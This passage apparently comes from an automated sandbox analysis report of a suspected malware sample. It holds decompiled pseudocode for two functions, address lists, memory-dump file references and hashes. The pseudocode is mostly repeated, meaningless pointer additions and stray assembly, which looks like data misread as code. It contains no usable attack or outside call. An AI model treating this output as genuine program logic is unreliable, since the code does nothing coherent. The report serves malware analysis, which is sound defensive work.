                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__edi =  *__edi + __ecx;
                                                        				asm("das");
                                                        				 *(__esi - 0x72d0faaf) =  *(__esi - 0x72d0faaf) ^ __ecx;
                                                        				_push(__eax);
                                                        				_push(es);
                                                        				asm("das");
                                                        				 *(__esi - 0x72d0f5af) =  *(__esi - 0x72d0f5af) ^ __ecx;
                                                        				_push(__eax);
                                                        				 *__edi =  *__edi | _t94;
                                                        				 *(__esi - 0x72d0f3af) =  *(__esi - 0x72d0f3af) ^ __ecx;
                                                        				_push(__eax);
                                                        				 *(__esi - 0x72d0faaf) =  *(__esi - 0x72d0faaf) ^ __ecx;
                                                        				_push(__eax);
                                                        				_pop(es);
                                                        				 *(__esi - 0x72d0fbaf) =  *(__esi - 0x72d0fbaf) ^ __ecx;
                                                        				_push(__eax);
                                                        				_t67 = __eax +  *__eax;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + _t67;
                                                        				 *_t67 =  *_t67 + __eax + 0xa;
                                                        				ss =  *((intOrPtr*)(__ecx + 0x1b));
                                                        				asm("das");
                                                        				asm("das");
                                                        				 *(__esi - 0x72d09daf) =  *(__esi - 0x72d09daf) ^ __ecx;
                                                        				_push(_t67);
                                                        				asm("a16 das");
                                                        				_t24 = __esi - 0x72d07aaf;
                                                        				 *_t24 =  *(__esi - 0x72d07aaf) ^ __ecx;
                                                        				_push(_t67);
                                                        				if( *_t24 >= 0) {
                                                        					ss =  *((intOrPtr*)(__ecx + 0x7d));
                                                        					asm("das");
                                                        					asm("das");
                                                        					asm("das");
                                                        					 *(__esi - 0x72d04baf) =  *(__esi - 0x72d04baf) ^ __ecx;
                                                        					_push(_t67);
                                                        					asm("scasb");
                                                        					asm("das");
                                                        					 *(__esi - 0x72d056af) =  *(__esi - 0x72d056af) ^ __ecx;
                                                        					_push(_t67);
                                                        					_t67 = 0x2f;
                                                        					 *(__esi - 0x72d02caf) =  *(__esi - 0x72d02caf) ^ __ecx;
                                                        					_push(0x2f);
                                                        					_t69 = 0xaf508d2f;
                                                        				}
                                                        				 *(_t92 - 0x72d035af) =  *(_t92 - 0x72d035af) ^ _t69;
                                                        				_push(_t67);
                                                        				asm("retf");
                                                        				asm("das");
                                                        				 *(_t92 - 0x72d01caf) =  *(_t92 - 0x72d01caf) ^ _t69;
                                                        				ss =  *((intOrPtr*)(_t69 - 0x1d));
                                                        				asm("das");
                                                        				asm("das");
                                                        				 *(_t92 - 0x72d036af) =  *(_t92 - 0x72d036af) ^ _t69;
                                                        				_push(_t67);
                                                        				asm("retf");
                                                        				 *(_t92 - 0x72d02aaf) =  *(_t92 - 0x72d02aaf) ^ _t69;
                                                        				_push(_t67);
                                                        				 *0xFFFFFFFF46803480 =  *0xFFFFFFFF46803480 ^ _t69;
                                                        				_push(_t67);
                                                        				_t68 = _t96;
                                                        				asm("das");
                                                        				 *0xFFFFFFFF46800980 =  *0xFFFFFFFF46800980 ^ _t69;
                                                        				_push(_t68);
                                                        				asm("invalid");
                                                        				 *0xFFFFFFFF467FE780 =  *0xFFFFFFFF467FE780 ^ _t69;
                                                        				_t70 = _t68;
                                                        				asm("das");
                                                        				_t85 = _t68 + 0x41;
                                                        				 *0xFFFFFFFFB9509E80 =  *0xFFFFFFFFB9509E80 ^ _t70;
                                                        				_push(_t70);
                                                        				asm("adc [eax], eax");
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t68;
                                                        				 *_t68 =  *_t68 + _t85;
                                                        				ss =  *((intOrPtr*)(_t70 + 0x11));
                                                        				 *0xFFFFFFFF47811180 =  *0xFFFFFFFF47811180 ^ _t70;
                                                        				_push(_t70);
                                                        				return _t68;
                                                        			}










                                                        0x00406da8
                                                        0x00406da8
                                                        0x00406da8
                                                        0x00406da9
                                                        0x00406dab
                                                        0x00406dad
                                                        0x00406daf
                                                        0x00406db1
                                                        0x00406db3
                                                        0x00406db9
                                                        0x00406dbb
                                                        0x00406dbd
                                                        0x00406dbf
                                                        0x00406dc1
                                                        0x00406dc3
                                                        0x00406dc5
                                                        0x00406dc7
                                                        0x00406dc9
                                                        0x00406dcb
                                                        0x00406dcd
                                                        0x00406dcf
                                                        0x00406dd1
                                                        0x00406dd3
                                                        0x00406dd5
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddb
                                                        0x00406ddd
                                                        0x00406ddf
                                                        0x00406de1
                                                        0x00406de3
                                                        0x00406de5
                                                        0x00406de7
                                                        0x00406de9
                                                        0x00406deb
                                                        0x00406ded
                                                        0x00406def
                                                        0x00406df1
                                                        0x00406df3
                                                        0x00406df5
                                                        0x00406df7
                                                        0x00406df9
                                                        0x00406dfb
                                                        0x00406dfd
                                                        0x00406dff
                                                        0x00406e01
                                                        0x00406e03
                                                        0x00406e05
                                                        0x00406e07
                                                        0x00406e09
                                                        0x00406e0b
                                                        0x00406e0d
                                                        0x00406e0f
                                                        0x00406e11
                                                        0x00406e13
                                                        0x00406e15
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e1b
                                                        0x00406e1d
                                                        0x00406e1f
                                                        0x00406e21
                                                        0x00406e23
                                                        0x00406e25
                                                        0x00406e27
                                                        0x00406e29
                                                        0x00406e2b
                                                        0x00406e2d
                                                        0x00406e2f
                                                        0x00406e31
                                                        0x00406e33
                                                        0x00406e35
                                                        0x00406e37
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3d
                                                        0x00406e3f
                                                        0x00406e41
                                                        0x00406e43
                                                        0x00406e45
                                                        0x00406e47
                                                        0x00406e49
                                                        0x00406e4b
                                                        0x00406e4d
                                                        0x00406e4f
                                                        0x00406e51
                                                        0x00406e53
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e59
                                                        0x00406e5b
                                                        0x00406e5d
                                                        0x00406e5f
                                                        0x00406e61
                                                        0x00406e63
                                                        0x00406e65
                                                        0x00406e67
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6d
                                                        0x00406e6f
                                                        0x00406e71
                                                        0x00406e73
                                                        0x00406e75
                                                        0x00406e77
                                                        0x00406e79
                                                        0x00406e7b
                                                        0x00406e7d
                                                        0x00406e7f
                                                        0x00406e81
                                                        0x00406e83
                                                        0x00406e85
                                                        0x00406e87
                                                        0x00406e89
                                                        0x00406e8b
                                                        0x00406e8d
                                                        0x00406e8f
                                                        0x00406e91
                                                        0x00406e93
                                                        0x00406e95
                                                        0x00406e97
                                                        0x00406e99
                                                        0x00406e9b
                                                        0x00406e9d
                                                        0x00406e9f
                                                        0x00406ea1
                                                        0x00406ea3
                                                        0x00406ea5
                                                        0x00406ea7
                                                        0x00406ea9
                                                        0x00406eab
                                                        0x00406ead
                                                        0x00406eaf
                                                        0x00406eb1
                                                        0x00406eb3
                                                        0x00406eb5
                                                        0x00406eb7
                                                        0x00406eb9
                                                        0x00406ebb
                                                        0x00406ebd
                                                        0x00406ebf
                                                        0x00406ec1
                                                        0x00406ec3
                                                        0x00406ec5
                                                        0x00406ec7
                                                        0x00406ec9
                                                        0x00406ecb
                                                        0x00406ecd
                                                        0x00406ecf
                                                        0x00406ed1
                                                        0x00406ed3
                                                        0x00406ed8
                                                        0x00406edc
                                                        0x00406ee2
                                                        0x00406ee3
                                                        0x00406ee4
                                                        0x00406ee8
                                                        0x00406eee
                                                        0x00406eef
                                                        0x00406ef4
                                                        0x00406efa
                                                        0x00406f00
                                                        0x00406f06
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0e
                                                        0x00406f0f
                                                        0x00406f11
                                                        0x00406f13
                                                        0x00406f15
                                                        0x00406f17
                                                        0x00406f19
                                                        0x00406f1b
                                                        0x00406f1d
                                                        0x00406f1f
                                                        0x00406f21
                                                        0x00406f23
                                                        0x00406f25
                                                        0x00406f27
                                                        0x00406f29
                                                        0x00406f2b
                                                        0x00406f2d
                                                        0x00406f2f
                                                        0x00406f31
                                                        0x00406f33
                                                        0x00406f35
                                                        0x00406f37
                                                        0x00406f39
                                                        0x00406f3b
                                                        0x00406f3d
                                                        0x00406f3f
                                                        0x00406f41
                                                        0x00406f43
                                                        0x00406f45
                                                        0x00406f47
                                                        0x00406f49
                                                        0x00406f4b
                                                        0x00406f4d
                                                        0x00406f4f
                                                        0x00406f51
                                                        0x00406f53
                                                        0x00406f55
                                                        0x00406f58
                                                        0x00406f5c
                                                        0x00406f60
                                                        0x00406f66
                                                        0x00406f67
                                                        0x00406f6c
                                                        0x00406f6c
                                                        0x00406f72
                                                        0x00406f73
                                                        0x00406f75
                                                        0x00406f78
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f84
                                                        0x00406f8a
                                                        0x00406f8b
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406f96
                                                        0x00406f97
                                                        0x00406f9c
                                                        0x00406fa2
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa8
                                                        0x00406fae
                                                        0x00406faf
                                                        0x00406fb0
                                                        0x00406fb4
                                                        0x00406fb5
                                                        0x00406fb8
                                                        0x00406fbc
                                                        0x00406fc0
                                                        0x00406fc6
                                                        0x00406fc7
                                                        0x00406fc8
                                                        0x00406fce
                                                        0x00406fd4
                                                        0x00406fda
                                                        0x00406fdb
                                                        0x00406fdc
                                                        0x00406fe0
                                                        0x00406fe6
                                                        0x00406fe7
                                                        0x00406fec
                                                        0x00406ff3
                                                        0x00406ff4
                                                        0x00406ff5
                                                        0x00406ff8
                                                        0x00406ffa
                                                        0x00406ffb
                                                        0x00406ffd
                                                        0x00406fff
                                                        0x00407001
                                                        0x00407003
                                                        0x00407005
                                                        0x00407007
                                                        0x00407009
                                                        0x0040700b
                                                        0x0040700d
                                                        0x00407010
                                                        0x00407016
                                                        0x00407017

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cecdb589f966b03f6293758286911b4dc19da2011bc1522f246e62575e8c940
                                                        • Instruction ID: 20bf51403c2509b144f3f333c661749d8aa9e89f02b69ed33ed482313f7fde02
                                                        • Opcode Fuzzy Hash: 6cecdb589f966b03f6293758286911b4dc19da2011bc1522f246e62575e8c940
                                                        • Instruction Fuzzy Hash: 4221FC7108A7C2DFD312D734D8989C2BFE99ECA21039A4DCDD0D49F077E2A45268C766
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 65%
                                                        			E00409350() {
                                                        				void* _t82;
                                                        				intOrPtr* _t83;
                                                        				intOrPtr* _t84;
                                                        				signed int* _t88;
                                                        				signed int _t101;
                                                        				signed int _t102;
                                                        				signed char _t106;
                                                        				signed int _t107;
                                                        				intOrPtr _t108;
                                                        				void* _t111;
                                                        				void* _t112;
                                                        				signed char* _t113;
                                                        				intOrPtr* _t120;
                                                        				signed int* _t122;
                                                        				void* _t127;
                                                        				void* _t133;
                                                        				signed int _t136;
                                                        				signed int _t138;
                                                        
                                                        				_t83 = _t82 + 1;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t106 =  *_t106 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *((intOrPtr*)(_t83 + 0x10)) =  *((intOrPtr*)(_t83 + 0x10)) + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t83;
                                                        				 *_t83 =  *_t83 + _t108;
                                                        				ss =  *((intOrPtr*)(_t106 + 0x16));
                                                        				 *(_t120 - 0x71cfcfaf) =  *(_t120 - 0x71cfcfaf) ^ _t106;
                                                        				_push(_t106);
                                                        				 *(_t120 - 0x71cfacaf) =  *(_t120 - 0x71cfacaf) ^ _t106;
                                                        				_t84 = _t106;
                                                        				 *(_t120 - 0x71cfadaf) =  *(_t120 - 0x71cfadaf) ^ _t106;
                                                        				_push(_t106);
                                                        				_t113 = _t112 - 1;
                                                        				_t10 = _t120 - 0x71cfa6af;
                                                        				 *_t10 =  *(_t120 - 0x71cfa6af) ^ _t106;
                                                        				_push(_t106);
                                                        				if( *_t10 >= 0) {
                                                        					L2:
                                                        					ss =  *((intOrPtr*)(_t106 + 0x73));
                                                        					 *(_t120 - 0x71cfa1af) =  *(_t120 - 0x71cfa1af) ^ _t106;
                                                        					_push(_t106);
                                                        					_push(_t84);
                                                        					 *(_t120 - 0x71cfa0af) =  *(_t120 - 0x71cfa0af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("aas");
                                                        					 *(_t120 - 0x71cfc6af) =  *(_t120 - 0x71cfc6af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("adc eax, [eax]");
                                                        					 *_t84 =  *_t84 + _t84;
                                                        					 *_t84 =  *_t84 + _t84;
                                                        					 *_t84 =  *_t84 + _t84;
                                                        					 *_t84 =  *_t84 + _t84;
                                                        					 *_t84 =  *_t84 + _t84;
                                                        					 *_t84 =  *_t84 + _t108;
                                                        					ss =  *((intOrPtr*)(_t106 - 0x7d));
                                                        					 *(_t120 - 0x71cf28af) =  *(_t120 - 0x71cf28af) ^ _t106;
                                                        					L3:
                                                        					ss =  *((intOrPtr*)(_t106 - 0x17));
                                                        					 *(_t120 - 0x71cf13af) =  *(_t120 - 0x71cf13af) ^ _t106;
                                                        					ss =  *((intOrPtr*)(_t106 - 0xb));
                                                        					 *(_t120 - 0x71cf04af) =  *(_t120 - 0x71cf04af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("clc");
                                                        					 *(_t120 - 0x71cf0aaf) =  *(_t120 - 0x71cf0aaf) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("in eax, dx");
                                                        					 *(_t120 - 0x71cf0caf) =  *(_t120 - 0x71cf0caf) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("sti");
                                                        					 *(_t120 - 0x71cf09af) =  *(_t120 - 0x71cf09af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("hlt");
                                                        					 *(_t120 - 0x71cf03af) =  *(_t120 - 0x71cf03af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("stc");
                                                        					 *(_t120 - 0x71cf0caf) =  *(_t120 - 0x71cf0caf) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("stc");
                                                        					 *(_t120 - 0x71cf03af) =  *(_t120 - 0x71cf03af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("cld");
                                                        					 *(_t120 - 0x71cf05af) =  *(_t120 - 0x71cf05af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("std");
                                                        					 *(_t120 - 0x71cf01af) =  *(_t120 - 0x71cf01af) ^ _t106;
                                                        					_push(_t106);
                                                        					asm("sti");
                                                        					 *(_t120 - 0x71cf07af) =  *(_t120 - 0x71cf07af) ^ _t106;
                                                        					_t122 = _t106;
                                                        					 *_t113 =  *_t113 >> _t106;
                                                        					asm("fistp qword [esi]");
                                                        					asm("loope 0x3f");
                                                        					_t88 = _t122;
                                                        					asm("pushad");
                                                        					asm("les edi, [edi]");
                                                        					_pop(_t133);
                                                        					asm("loop 0x40");
                                                        					asm("xlatb");
                                                        					_t107 = _t106 + 1;
                                                        					asm("pushad");
                                                        					 *_t88 =  *_t88 >> 1;
                                                        					asm("aam 0x3b");
                                                        					asm("loop 0x41");
                                                        					asm("int3");
                                                        					asm("fidivr dword [edi]");
                                                        					_t127 = _t133;
                                                        					_pop(_t136);
                                                        					asm("fild word [edx-0x69]");
                                                        					asm("pushad");
                                                        					asm("pushad");
                                                        					asm("fdivr dword [esp+edx*4]");
                                                        					asm("fidivr word [ebx]");
                                                        					_pop(_t111);
                                                        					asm("fistp qword [esi]");
                                                        					_t101 = _t136;
                                                        					L7:
                                                        					_pop(_t138);
                                                        					asm("fnstsw word [esi]");
                                                        					_t102 = _t138;
                                                        					asm("aad 0x31");
                                                        					ss =  *((intOrPtr*)(_t111 - 0x6c));
                                                        					 *(_t127 - 0x71cfa1af) =  *(_t127 - 0x71cfa1af) ^ _t107;
                                                        					_push(_t107);
                                                        					_push(ss);
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					 *_t102 =  *_t102 + _t102;
                                                        					_t101 = _t107;
                                                        					_t107 = _t102;
                                                        					_push(_t127);
                                                        					_push(_t101);
                                                        					asm("lahf");
                                                        					asm("insb");
                                                        					goto L7;
                                                        				}
                                                        				ss =  *((intOrPtr*)(_t106 + 0x73));
                                                        				 *(_t120 - 0x71cf8eaf) =  *(_t120 - 0x71cf8eaf) ^ _t106;
                                                        				_push(_t106);
                                                        				 *_t84 = _t120;
                                                        				ss =  *((intOrPtr*)(_t106 - 0x73));
                                                        				 *( *_t84 - 0x71cf84af) =  *( *_t84 - 0x71cf84af) ^ _t106;
                                                        				_push(_t106);
                                                        				_t120 = _t84;
                                                        				ss =  *((intOrPtr*)(_t106 - 0x72));
                                                        				 *(_t120 - 0x71cf64af) =  *(_t120 - 0x71cf64af) ^ _t106;
                                                        				_push(_t106);
                                                        				_t22 = _t108;
                                                        				_t108 =  *_t84;
                                                        				 *_t84 = _t22;
                                                        				ss =  *((intOrPtr*)(_t106 - 0x76));
                                                        				_t24 = _t120 - 0x71cf6faf;
                                                        				 *_t24 =  *(_t120 - 0x71cf6faf) ^ _t106;
                                                        				_push(_t106);
                                                        				if( *_t24 > 0) {
                                                        					goto L3;
                                                        				}
                                                        				goto L2;
                                                        			}





















                                                        0x00409350
                                                        0x00409351
                                                        0x00409353
                                                        0x00409355
                                                        0x00409357
                                                        0x00409359
                                                        0x0040935b
                                                        0x00409361
                                                        0x00409363
                                                        0x00409365
                                                        0x00409367
                                                        0x00409369
                                                        0x0040936b
                                                        0x0040936d
                                                        0x0040936f
                                                        0x00409371
                                                        0x00409373
                                                        0x00409375
                                                        0x00409377
                                                        0x00409379
                                                        0x0040937b
                                                        0x0040937d
                                                        0x0040937f
                                                        0x00409381
                                                        0x00409383
                                                        0x00409385
                                                        0x00409387
                                                        0x00409389
                                                        0x0040938b
                                                        0x0040938d
                                                        0x0040938f
                                                        0x00409391
                                                        0x00409393
                                                        0x00409395
                                                        0x00409397
                                                        0x00409399
                                                        0x0040939b
                                                        0x0040939d
                                                        0x0040939f
                                                        0x004093a1
                                                        0x004093a3
                                                        0x004093a5
                                                        0x004093a7
                                                        0x004093a9
                                                        0x004093ab
                                                        0x004093ad
                                                        0x004093af
                                                        0x004093b1
                                                        0x004093b3
                                                        0x004093b5
                                                        0x004093b7
                                                        0x004093b9
                                                        0x004093bb
                                                        0x004093bd
                                                        0x004093bf
                                                        0x004093c1
                                                        0x004093c3
                                                        0x004093c5
                                                        0x004093c7
                                                        0x004093c9
                                                        0x004093cb
                                                        0x004093cd
                                                        0x004093cf
                                                        0x004093d1
                                                        0x004093d3
                                                        0x004093d5
                                                        0x004093d7
                                                        0x004093d9
                                                        0x004093db
                                                        0x004093dd
                                                        0x004093df
                                                        0x004093e1
                                                        0x004093e3
                                                        0x004093e5
                                                        0x004093e7
                                                        0x004093e9
                                                        0x004093eb
                                                        0x004093ed
                                                        0x004093ef
                                                        0x004093f1
                                                        0x004093f3
                                                        0x004093f5
                                                        0x004093f7
                                                        0x004093f9
                                                        0x004093fc
                                                        0x00409402
                                                        0x00409404
                                                        0x0040940b
                                                        0x0040940c
                                                        0x00409412
                                                        0x00409413
                                                        0x00409414
                                                        0x00409414
                                                        0x0040941a
                                                        0x0040941b
                                                        0x0040944d
                                                        0x0040944d
                                                        0x00409450
                                                        0x00409456
                                                        0x00409457
                                                        0x00409458
